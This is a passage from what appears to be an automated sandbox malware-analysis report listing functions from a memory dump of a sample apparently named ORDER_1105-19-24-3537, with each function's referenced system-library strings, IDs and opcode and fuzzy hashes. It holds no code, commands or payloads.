Instruction ID: 8153e0d8ccbb18374daa44082ce70e6e703f8587164450e409832b8e842f8dc4
Opcode Fuzzy Hash: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
Instruction Fuzzy Hash: 2CC1AF312243429BEB26CF28C841B6BBBE5AFD4318F444B2CF6968B2D2D775D545CB41

Function 011BE6F2 Relevance: 2.7, Strings: 2, Instructions: 179COMMON

Download Yara Rule

Strings

UEFI, xrefs: 011BE751
Legacy, xrefs: 011BE75A

Memory Dump Source

Source File: 00000004.00000002.2166776693.0000000001110000.00000040.00001000.00020000.00000000.sdmp, Offset: 01110000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1110000_ORDER_1105-19-24-3537.jbxd

Similarity

API ID: InitializeThunk
String ID: Legacy$UEFI
API String ID: 2994545307-634100481
Opcode ID: 32b0c917efee5da31790b53579fea0beeba784a2fef77fef94492161c9fb4533
Instruction ID: a04e6c79fa9642a78be1bc00ef6fb41e208c568cb2ae0db8015a8524967dbc60
Opcode Fuzzy Hash: 32b0c917efee5da31790b53579fea0beeba784a2fef77fef94492161c9fb4533
Instruction Fuzzy Hash: AE616C72E017199FDB19DFA8C880BEEBBB5FB48704F14816DE659EB251E731A900CB50

Function 011E43D4 Relevance: 2.7, Strings: 2, Instructions: 169COMMON

Download Yara Rule

Strings

@, xrefs: 011E4437
MUI, xrefs: 011E4525

Memory Dump Source

Source File: 00000004.00000002.2166776693.0000000001110000.00000040.00001000.00020000.00000000.sdmp, Offset: 01110000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1110000_ORDER_1105-19-24-3537.jbxd

Similarity

API ID:
String ID: @$MUI
API String ID: 0-17815947
Opcode ID: 4ba98015af89d61aad653276c0d161c7512938f19e41cf243825fc53fbcf1c5d
Instruction ID: 886b341f51b85c4e9acc004d3401a172fcb57185c4733281f7f1c856b5b66442
Opcode Fuzzy Hash: 4ba98015af89d61aad653276c0d161c7512938f19e41cf243825fc53fbcf1c5d
Instruction Fuzzy Hash: 64511771E0061EAFDB15DFE9CC84AEEBBF8AF44758F104529E611E7690D7309A05CB60

Function 011404E5 Relevance: 2.7, Strings: 2, Instructions: 153COMMON

Download Yara Rule

Strings

TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 0114063D
kLsE, xrefs: 01140540

Memory Dump Source

Source File: 00000004.00000002.2166776693.0000000001110000.00000040.00001000.00020000.00000000.sdmp, Offset: 01110000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1110000_ORDER_1105-19-24-3537.jbxd

Similarity

API ID:
String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
API String ID: 0-2547482624
Opcode ID: 73bb5f86501a63f905f435618f0d035bf17db0b70ecc4c64cdfaf8c6a9590bb3
Instruction ID: 96a328b92cc69fc84b28c29e61d0262897ae6f7f43575d1bc2a6d5b55f0bb63a
Opcode Fuzzy Hash: 73bb5f86501a63f905f435618f0d035bf17db0b70ecc4c64cdfaf8c6a9590bb3
Instruction Fuzzy Hash: 6951BF715047429BD728DF6AC4406E7B7E8AF88B04F10483EE6EA87241E770D545CF92

Function 0114A2C3 Relevance: 2.6, Strings: 2, Instructions: 118COMMON

Download Yara Rule

Strings

RtlpResUltimateFallbackInfo Enter, xrefs: 0114A2FB
RtlpResUltimateFallbackInfo Exit, xrefs: 0114A309

Memory Dump Source

Source File: 00000004.00000002.2166776693.0000000001110000.00000040.00001000.00020000.00000000.sdmp, Offset: 01110000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1110000_ORDER_1105-19-24-3537.jbxd

Similarity

API ID:
String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
API String ID: 0-2876891731
Opcode ID: 31ab6bc1619fd32a9708ca3f62491ebe0007f3dd9a587389f2fb2d8b7b1a48ef
Instruction ID: fe1f20fbdea1b6b75f49521ae85809c642b38f98055dce5152bf45d7fb8127ba
Opcode Fuzzy Hash: 31ab6bc1619fd32a9708ca3f62491ebe0007f3dd9a587389f2fb2d8b7b1a48ef
Instruction Fuzzy Hash: D5411235A48245CFDB2DCF69D840B6EBBB4FF85B04F1640A9E912DB291E3B5D900CB41

Function 0117A5D0 Relevance: 2.5, Strings: 2, Instructions: 38COMMON

Download Yara Rule

Strings

Threadpool!, xrefs: 0117A5E9
Cleanup Group, xrefs: 0117A5E4

Memory Dump Source

Source File: 00000004.00000002.2166776693.0000000001110000.00000040.00001000.00020000.00000000.sdmp, Offset: 01110000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1110000_ORDER_1105-19-24-3537.jbxd

Similarity

API ID: InitializeThunk
String ID: Cleanup Group$Threadpool!
API String ID: 2994545307-4008356553
Opcode ID: 06b1be0bb0705e0c412a94297834d45192c33a870b9cb0c9e25cbc511db318fe
Instruction ID: 34f019aa1f939aa9d47f53e321486063081712640a95c1538678e8555e6287df
Opcode Fuzzy Hash: 06b1be0bb0705e0c412a94297834d45192c33a870b9cb0c9e25cbc511db318fe
Instruction Fuzzy Hash: 3901F4B2240704AFD316DF14DD49F1A77F9EB85719F058939B648C7694E334D904CB46

Function 0114C7C0 Relevance: 2.2, Strings: 1, Instructions: 960COMMON

Download Yara Rule

Strings

MUI, xrefs: 0114C8C3, 0114CA40

Memory Dump Source

Source File: 00000004.00000002.2166776693.0000000001110000.00000040.00001000.00020000.00000000.sdmp, Offset: 01110000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1110000_ORDER_1105-19-24-3537.jbxd

Similarity

API ID:
String ID: MUI
API String ID: 0-1339004836
Opcode ID: 7e1f8dd0c430b2908d8cacb34e224b3ca9d230c054b4ac3446c59bce843adb97
Instruction ID: 5436cd21b720be1c8405fe21bc9845280ed6e4ef9b34b16a819e4b48c5a0daf1
Opcode Fuzzy Hash: 7e1f8dd0c430b2908d8cacb34e224b3ca9d230c054b4ac3446c59bce843adb97
Instruction Fuzzy Hash: F1827B75E012198FEF29CFA9D880BEDBBB1BF48B50F14816AD919AB350D7309941CF91

Function 011C6420 Relevance: 1.5, Strings: 1, Instructions: 264COMMON

Download Yara Rule

Strings

, xrefs: 011C65C1

Memory Dump Source

Source File: 00000004.00000002.2166776693.0000000001110000.00000040.00001000.00020000.00000000.sdmp, Offset: 01110000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1110000_ORDER_1105-19-24-3537.jbxd

Similarity

API ID:
String ID:
API String ID: 0-3916222277
Opcode ID: 05d234c9437050fe9f1255f37f5d14375053d059c14d1e3cf4ad38369b3589b6
Instruction ID: f9978d007d2b5c0eb0f0b2e234a47672d9f88a8f5baa15d15374716e6f6bb13b
Opcode Fuzzy Hash: 05d234c9437050fe9f1255f37f5d14375053d059c14d1e3cf4ad38369b3589b6
Instruction Fuzzy Hash: C9918372900219AFEB29DF95CC85FAEBBB8EF24B54F104019F601AB291D775ED00CB60

Function 011EE10E Relevance: 1.5, Strings: 1, Instructions: 255COMMON

Download Yara Rule

Strings

, xrefs: 011EE1FA

Memory Dump Source

Source File: 00000004.00000002.2166776693.0000000001110000.00000040.00001000.00020000.00000000.sdmp, Offset: 01110000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1110000_ORDER_1105-19-24-3537.jbxd

Similarity

API ID:
String ID:
API String ID: 0-3916222277
Opcode ID: d349a47b6618f0412a4d38469f93c30b50031ea23b4319a7b46eb5979ecee4e6
Instruction ID: e5fa7f23eba8f10e0e99789d2344ac01456f9244d0cb0ba8d9bb6b95c2354b2e
Opcode Fuzzy Hash: d349a47b6618f0412a4d38469f93c30b50031ea23b4319a7b46eb5979ecee4e6
Instruction Fuzzy Hash: E991AF31902A0AAFDB2AAFE5DC48FEFBBB9EF45744F140029F511A7250EB749901CB51

Function 0117A660 Relevance: 1.4, Strings: 1, Instructions: 200COMMON

Download Yara Rule

Strings

GlobalTags, xrefs: 011B67C9

Memory Dump Source

Source File: 00000004.00000002.2166776693.0000000001110000.00000040.00001000.00020000.00000000.sdmp, Offset: 01110000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1110000_ORDER_1105-19-24-3537.jbxd

Similarity

API ID:
String ID: GlobalTags
API String ID: 0-1106856819
Opcode ID: 3774ceaa6699ef9f5a7729dfd8e00ace83fef413da378d9b4ff4d6b15a5ec178
Instruction ID: 87ccc432c79965ae32832d52ed0fb4e3b05abf3e2d9e618486562aaf2e5711c1
Opcode Fuzzy Hash: 3774ceaa6699ef9f5a7729dfd8e00ace83fef413da378d9b4ff4d6b15a5ec178
Instruction Fuzzy Hash: FD7159B5E0021A9FDF2CCF98D590AEDBBB2BF68704F14812EE905A7245E7319941CB60

Function 011E4978 Relevance: 1.4, Strings: 1, Instructions: 153COMMON

Download Yara Rule

Strings

.mui, xrefs: 011E4A7F

Memory Dump Source

Source File: 00000004.00000002.2166776693.0000000001110000.00000040.00001000.00020000.00000000.sdmp, Offset: 01110000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1110000_ORDER_1105-19-24-3537.jbxd

Similarity

API ID:
String ID: .mui
API String ID: 0-1199573805
Opcode ID: 78272a99e533309f557ffc028168149f88ced713940c7abc3ee32da852cd9f86
Instruction ID: 48c3ae51b3ccf9ad0d7d7c9f1317d5671d346dd789bde121ddb39691cc54e30b
Opcode Fuzzy Hash: 78272a99e533309f557ffc028168149f88ced713940c7abc3ee32da852cd9f86
Instruction Fuzzy Hash: 69519372D0062ADBDF18DFD9D848AAEBBF5AF44A54F054129EA11FB740D3349801CBE4

Function 0115E627 Relevance: 1.4, Strings: 1, Instructions: 148COMMON

Download Yara Rule

Strings

EXT-, xrefs: 0115E6A4

Memory Dump Source

Source File: 00000004.00000002.2166776693.0000000001110000.00000040.00001000.00020000.00000000.sdmp, Offset: 01110000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1110000_ORDER_1105-19-24-3537.jbxd

Similarity

API ID:
String ID: EXT-
API String ID: 0-1948896318
Opcode ID: a0309d4b64497eeaaf4453a322771887751392264524ab635f9226b6c6a2b83d
Instruction ID: 9697d6f22be901a6bbf987fab01bc0f60b38458ff2ab0225406f80c40ce7115e
Opcode Fuzzy Hash: a0309d4b64497eeaaf4453a322771887751392264524ab635f9226b6c6a2b83d
Instruction Fuzzy Hash: E441A072909702DBD759DA75C840B6BFBE8AF88708F44092DFAA4D7180E774DA04C797

Function 011BC730 Relevance: 1.4, Strings: 1, Instructions: 129COMMON

Download Yara Rule

Strings

BinaryHash, xrefs: 011BC77F

Memory Dump Source

Source File: 00000004.00000002.2166776693.0000000001110000.00000040.00001000.00020000.00000000.sdmp, Offset: 01110000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1110000_ORDER_1105-19-24-3537.jbxd

Similarity

API ID:
String ID: BinaryHash
API String ID: 0-2202222882
Opcode ID: 9b39677631f8e4c4dabb57607abae41739060df1df40877c19c18bf2d98fa2ae
Instruction ID: 484925d1c1e349b25de99d87d96408bda28f9cc3fb3b3e7da3dcba79c58b74fb
Opcode Fuzzy Hash: 9b39677631f8e4c4dabb57607abae41739060df1df40877c19c18bf2d98fa2ae
Instruction Fuzzy Hash: E24142B1D0012DABDB25DA50CC84FDEB77CAB54718F0085A5EA08AB140DB709E89CFE4

Function 011D6B40 Relevance: 1.4, Strings: 1, Instructions: 106COMMON

Download Yara Rule

Strings

#, xrefs: 011D6B91

Memory Dump Source

Source File: 00000004.00000002.2166776693.0000000001110000.00000040.00001000.00020000.00000000.sdmp, Offset: 01110000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1110000_ORDER_1105-19-24-3537.jbxd

Similarity

API ID:
String ID: #
API String ID: 0-1885708031
Opcode ID: 3511d574ca01bf236e94dc9099eeb40b4009826d3f148836e01627e95c94ee35
Instruction ID: 43cb6b691c3c945b893a3d976ad1a9033693a8d4f5208b462af992e5b3d4b86f
Opcode Fuzzy Hash: 3511d574ca01bf236e94dc9099eeb40b4009826d3f148836e01627e95c94ee35
Instruction Fuzzy Hash: D6314831A00719DBEB3ADF69C854BEEBBB8DF05708F144028E954AB282DB75E905CB50

Function 011BCA72 Relevance: 1.3, Strings: 1, Instructions: 94COMMON

Download Yara Rule

Strings

BinaryName, xrefs: 011BCAA2

Memory Dump Source

Source File: 00000004.00000002.2166776693.0000000001110000.00000040.00001000.00020000.00000000.sdmp, Offset: 01110000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1110000_ORDER_1105-19-24-3537.jbxd

Similarity

API ID:
String ID: BinaryName
API String ID: 0-215506332
Opcode ID: 085f2c4dfca75ca1135c08c1098e7c7251859b08a890fd42217c215e3855273b
Instruction ID: 5a127b7385a6ec33458f3095f3c5e6fb8bfec8bd0883d37686e4158fa94d8525
Opcode Fuzzy Hash: 085f2c4dfca75ca1135c08c1098e7c7251859b08a890fd42217c215e3855273b
Instruction Fuzzy Hash: BB312736900515AFEB1EDB59C991FEFBB75EF80790F018129E911A7250D7309E00DBE0

Function 011C892A Relevance: 1.3, Strings: 1, Instructions: 47COMMON

Download Yara Rule

Strings

AVRF: AVrfDllUnloadNotification called for a provider (%p) , xrefs: 011C895E

Memory Dump Source

Source File: 00000004.00000002.2166776693.0000000001110000.00000040.00001000.00020000.00000000.sdmp, Offset: 01110000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1110000_ORDER_1105-19-24-3537.jbxd

Similarity

API ID:
String ID: AVRF: AVrfDllUnloadNotification called for a provider (%p)
API String ID: 0-702105204
Opcode ID: 285bf74a33caee6b3c574b491d8c606354a9363396c4c8faf279b1db7f14fa74
Instruction ID: 1cdc7844f0a2b57ea4b9a82eac14244e49cbff512b5540cdade51e68729743c5
Opcode Fuzzy Hash: 285bf74a33caee6b3c574b491d8c606354a9363396c4c8faf279b1db7f14fa74
Instruction Fuzzy Hash: 79017B723102029BEA2C5B19DCC9ADABB64EFE1F58B04001CF64506111EB20AC80C796

Function 011E2000 Relevance: .8, Instructions: 757COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2166776693.0000000001110000.00000040.00001000.00020000.00000000.sdmp, Offset: 01110000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1110000_ORDER_1105-19-24-3537.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: df5e01f792355697a5a1e38638e39bbe221e1899bc6c89823f7e3f1054034ecf
Instruction ID: ab5e46e463705a0c715ab2fce9e3354398f4b3c7626004cf3d11de3c143ad320
Opcode Fuzzy Hash: df5e01f792355697a5a1e38638e39bbe221e1899bc6c89823f7e3f1054034ecf
Instruction Fuzzy Hash: E342EA71608B418FD71DCFA8C8A4A6FBBE9BF98304F08492DFA9287250D771D945CB52

Function 011D8158 Relevance: .6, Instructions: 617COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2166776693.0000000001110000.00000040.00001000.00020000.00000000.sdmp, Offset: 01110000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1110000_ORDER_1105-19-24-3537.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: eef2af494280b41d9264449d62789a676db9bba8a681b5bc916fc8c9750ff451
Instruction ID: e2ae22fdfff4bf82523f4b0112eecbde59c81565e11a0f339141fb1e159ac2fc
Opcode Fuzzy Hash: eef2af494280b41d9264449d62789a676db9bba8a681b5bc916fc8c9750ff451
Instruction Fuzzy Hash: 6A426D71E102199FEB28CF69C881BADBBF5BF88314F158199E94DEB241DB349981CF50

Function 01152840 Relevance: .6, Instructions: 605COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2166776693.0000000001110000.00000040.00001000.00020000.00000000.sdmp, Offset: 01110000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1110000_ORDER_1105-19-24-3537.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 86a29e5569f9836ca2770bba8cb50b49d1a35e2ab9b8f573d2020aa60433cddb
Instruction ID: ab8cde032b8adf773641651fd3dcc6c70fdc7a9b3c173efb42a4ff9c5d369672
Opcode Fuzzy Hash: 86a29e5569f9836ca2770bba8cb50b49d1a35e2ab9b8f573d2020aa60433cddb
Instruction Fuzzy Hash: A132BA78A00755CBEB2DCF69C8447BABFF2AF84304F68411DD59A9B285E735A802CB51

Function 011EA118 Relevance: .6, Instructions: 591COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2166776693.0000000001110000.00000040.00001000.00020000.00000000.sdmp, Offset: 01110000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1110000_ORDER_1105-19-24-3537.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1273580780c0ad1ab630a0c0fb1891a3787a5ae543d73f0b828e9739ef74a11a
Instruction ID: f96ef592060c57b211970c22fb25633dc31bafd6618ddfae356f1b6adcf60aec
Opcode Fuzzy Hash: 1273580780c0ad1ab630a0c0fb1891a3787a5ae543d73f0b828e9739ef74a11a
Instruction Fuzzy Hash: CE22E374604E618BEB2DCFADE098372BBF1AF45300F098459E9978F286D335E452CB61

Function 01146A50 Relevance: .5, Instructions: 548COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2166776693.0000000001110000.00000040.00001000.00020000.00000000.sdmp, Offset: 01110000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1110000_ORDER_1105-19-24-3537.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d42b2afb9699ab6a546269c26bae9949349385529d3ed8ea3f559f58c0eca4e9
Instruction ID: 75b1f20cddec72d78baadf2d8ea83bb5fe698bb7ac50654402f851972354dec1
Opcode Fuzzy Hash: d42b2afb9699ab6a546269c26bae9949349385529d3ed8ea3f559f58c0eca4e9
Instruction Fuzzy Hash: AF32FF74A00205DFDB29CF68C480BAEBBF1FF49714F24856AE956AB391D730E841CB91

Function 01164A35 Relevance: .4, Instructions: 423COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2166776693.0000000001110000.00000040.00001000.00020000.00000000.sdmp, Offset: 01110000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1110000_ORDER_1105-19-24-3537.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e8a3620866af67e9ba5ee0a5ffcffd4608486dc740fad13053f627f14a392904
Instruction ID: 221f72400c901743739e1a72864e9cd66ce2e2af04ccc9b0d00bd8baacfc3a65
Opcode Fuzzy Hash: e8a3620866af67e9ba5ee0a5ffcffd4608486dc740fad13053f627f14a392904
Instruction Fuzzy Hash: 79F1AF74E0020A9BDB1DCF99C480BAEBBF9BF58714F098129E905EB744E735D851CB60

Function 011D892B Relevance: .4, Instructions: 386COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2166776693.0000000001110000.00000040.00001000.00020000.00000000.sdmp, Offset: 01110000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1110000_ORDER_1105-19-24-3537.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1df200ed10e87b995b99cbc872f52ea1af5ed628ffe736133c3ec8384f9b823a
Instruction ID: 6fbf219e17ada2064a0ec9e79ceb89227826d1cbca68941f284861f6d5b3f9f6
Opcode Fuzzy Hash: 1df200ed10e87b995b99cbc872f52ea1af5ed628ffe736133c3ec8384f9b823a
Instruction Fuzzy Hash: F7D1E171E0060A9BDF0DCF69C841BFEB7F1AF88304F198169D955A7281E735E905CB60

Function 011465D0 Relevance: .4, Instructions: 383COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2166776693.0000000001110000.00000040.00001000.00020000.00000000.sdmp, Offset: 01110000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1110000_ORDER_1105-19-24-3537.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0c47044839be8708a0906033fc8503d53a4ade07f417b8c7ac8686e25dad9e16
Instruction ID: a8186ce6deaf9b42c5de31a51b3c52e9bc14013ce4afd377a65d952e19171f11
Opcode Fuzzy Hash: 0c47044839be8708a0906033fc8503d53a4ade07f417b8c7ac8686e25dad9e16
Instruction Fuzzy Hash: 26E1B275608342CFC719CF28C490A6ABBE1FF8A718F05896DE99587351E731E905CF92

Function 01138397 Relevance: .4, Instructions: 380COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2166776693.0000000001110000.00000040.00001000.00020000.00000000.sdmp, Offset: 01110000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1110000_ORDER_1105-19-24-3537.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d4b483d251cd1b76d36e81f8e432ef11e2cd7a17d71cd2d6250dcad0c4b6d167
Instruction ID: e1079a99440c544739746080d48bfa853ab24ccf1e1243bd3e43de6d88f923ef
Opcode Fuzzy Hash: d4b483d251cd1b76d36e81f8e432ef11e2cd7a17d71cd2d6250dcad0c4b6d167
Instruction Fuzzy Hash: 2CD1E4B1A006069BDF1DDF69D880FBA77A5BF94308F05422DF925DB284E730E951CB90

Function 011C8243 Relevance: .3, Instructions: 322COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2166776693.0000000001110000.00000040.00001000.00020000.00000000.sdmp, Offset: 01110000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1110000_ORDER_1105-19-24-3537.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c58da6bef63a17e65f3132630e1fabe04f2e2fb92a18dec9866503995c4710af
Instruction ID: 829c38693c217f8ff4b4bbf5e8674c44009093b2a3fce3f2ff99229e31526bf1
Opcode Fuzzy Hash: c58da6bef63a17e65f3132630e1fabe04f2e2fb92a18dec9866503995c4710af
Instruction Fuzzy Hash: B3B1A674A006059FDF28DF99C984EAFBBBAFFA4704F14445EAA4297790DB34E905CB10

Function 01150535 Relevance: .3, Instructions: 300COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2166776693.0000000001110000.00000040.00001000.00020000.00000000.sdmp, Offset: 01110000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1110000_ORDER_1105-19-24-3537.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c61ad9210afadd02b75b489723f8fea184d45ce3a0816f7da46b339e1a5f1bc9
Instruction ID: 40110aefd67d10caf4a7dcda2ed356318fa47d283baf6387dbe4a059d1621911
Opcode Fuzzy Hash: c61ad9210afadd02b75b489723f8fea184d45ce3a0816f7da46b339e1a5f1bc9
Instruction Fuzzy Hash: 13B13735604646EFDB1DCBA8C850BBEBFF6AF48304F190169EA6297281D770ED41CB91

Function 011483C0 Relevance: .3, Instructions: 281COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2166776693.0000000001110000.00000040.00001000.00020000.00000000.sdmp, Offset: 01110000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1110000_ORDER_1105-19-24-3537.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bdda4525741970e76e52d0cea0b5307b301dbf94ee8beb300256111b04a81357
Instruction ID: 399c576f8062e893b15090d616cdba99a402e3c9b7400d38019819a2a7c26837
Opcode Fuzzy Hash: bdda4525741970e76e52d0cea0b5307b301dbf94ee8beb300256111b04a81357
Instruction Fuzzy Hash: 5BC16974608341DFD768CF58C484BABBBE5BF88704F44496DE9898B291D774E908CF92

Function 0113C427 Relevance: .3, Instructions: 280COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2166776693.0000000001110000.00000040.00001000.00020000.00000000.sdmp, Offset: 01110000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1110000_ORDER_1105-19-24-3537.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7997a2fe253284666c2f5bb18264def334bef3bcb020688e5addef289615c0be
Instruction ID: 1b2752b227e9f7e56b52c4f21d800984e42cd056a9b6740bf89362d15a4733a9
Opcode Fuzzy Hash: 7997a2fe253284666c2f5bb18264def334bef3bcb020688e5addef289615c0be
Instruction Fuzzy Hash: 68B18470B002658BDB68DF58C890BA9B7B5EF84704F0485EAD54AE7285EB30DD86CF61

Function 0116E5E7 Relevance: .3, Instructions: 278COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2166776693.0000000001110000.00000040.00001000.00020000.00000000.sdmp, Offset: 01110000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1110000_ORDER_1105-19-24-3537.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1241e7bf51108950e683453a68008c088c9fa9f6ba796e5574fc6fb48e184bcf
Instruction ID: 6b45dab0f49d9b414628ad87ed61a6f31713676e7f354e30096de4e5240be81f
Opcode Fuzzy Hash: 1241e7bf51108950e683453a68008c088c9fa9f6ba796e5574fc6fb48e184bcf
Instruction Fuzzy Hash: 52A11739E0161A9FEB2DDB58C848FAEBFB8AF00714F050215EA11AB291D7789D51CBD1

Function 01180185 Relevance: .3, Instructions: 276COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2166776693.0000000001110000.00000040.00001000.00020000.00000000.sdmp, Offset: 01110000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1110000_ORDER_1105-19-24-3537.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b92394ae10720688c230d90e456ff7019836ee6f87d83feb9f99d4151be1e93c
Instruction ID: a120f5989a66d62b73e76d53d3f51d13428657bb1ac5dc542828ea55f35bcbf8
Opcode Fuzzy Hash: b92394ae10720688c230d90e456ff7019836ee6f87d83feb9f99d4151be1e93c
Instruction Fuzzy Hash: A8A1C571B0161E9FDB2DEF69C490BAAB7B5FF58318F008029EA4597281DB74E816CF50

Function 01214500 Relevance: .3, Instructions: 275COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2166776693.0000000001110000.00000040.00001000.00020000.00000000.sdmp, Offset: 01110000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1110000_ORDER_1105-19-24-3537.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ec25ad8ec05cf165ed2d9718a93f56bac6701ce2fcfd9ad3962eea3bfc0345a4
Instruction ID: 9f1963c1768e85311d8ad46af644a92ae0ef32a343df2d4866f16ecf7c20dfd8
Opcode Fuzzy Hash: ec25ad8ec05cf165ed2d9718a93f56bac6701ce2fcfd9ad3962eea3bfc0345a4
Instruction Fuzzy Hash: 7FA1E172624292EFC726EF18CD80B1AB7E9FF68748F050528EA599B654C374ED01CF91

Function 011C60E0 Relevance: .3, Instructions: 264COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2166776693.0000000001110000.00000040.00001000.00020000.00000000.sdmp, Offset: 01110000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1110000_ORDER_1105-19-24-3537.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 828187470f608d0a2f97c9168eca1364493afab02c6fb2672f4b7c63f4d4ac5c
Instruction ID: eac32959ae68cf17e102cdbeb028f64b3321565e5b5f1b393f94e02e0589b893
Opcode Fuzzy Hash: 828187470f608d0a2f97c9168eca1364493afab02c6fb2672f4b7c63f4d4ac5c
Instruction Fuzzy Hash: D991B171D04216AFDB19CFA8D894BAEBBB5AF58B10F15416DE614AB341D734E900CBA0

Function 0115E3F0 Relevance: .3, Instructions: 261COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2166776693.0000000001110000.00000040.00001000.00020000.00000000.sdmp, Offset: 01110000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1110000_ORDER_1105-19-24-3537.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 045ab07340490098a5783f6ee0e7946ddea9643f796d7a3d0523c7d66c5afa9c
Instruction ID: 313e6bb41b5806c83a824550bc5feea9c63095713ebd685018a331ac66715ee4
Opcode Fuzzy Hash: 045ab07340490098a5783f6ee0e7946ddea9643f796d7a3d0523c7d66c5afa9c
Instruction Fuzzy Hash: F391363AE0161ADBEB6CDB68C440BBEBFA2EF94718F054065ED25DB240E734DA41CB51

Function 01196ACC Relevance: .2, Instructions: 226COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2166776693.0000000001110000.00000040.00001000.00020000.00000000.sdmp, Offset: 01110000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1110000_ORDER_1105-19-24-3537.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 538b8659667f5dbd5c4a1e264561a04a7bb857debd2085a2a5ce566e5d09275a
Instruction ID: 9e9c7f9ee4bc6c4a1610e6d0c7aae287fa03bb66ffb011cb56664d220a18cabd
Opcode Fuzzy Hash: 538b8659667f5dbd5c4a1e264561a04a7bb857debd2085a2a5ce566e5d09275a
Instruction Fuzzy Hash: 29819271E006169BDF18CF69C950ABEBBF9FB48700F14852EE466D7640E734E941CBA4

Function 0120AB40 Relevance: .2, Instructions: 222COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2166776693.0000000001110000.00000040.00001000.00020000.00000000.sdmp, Offset: 01110000, based on PE: true

Joe Sandbox IDA Plugin

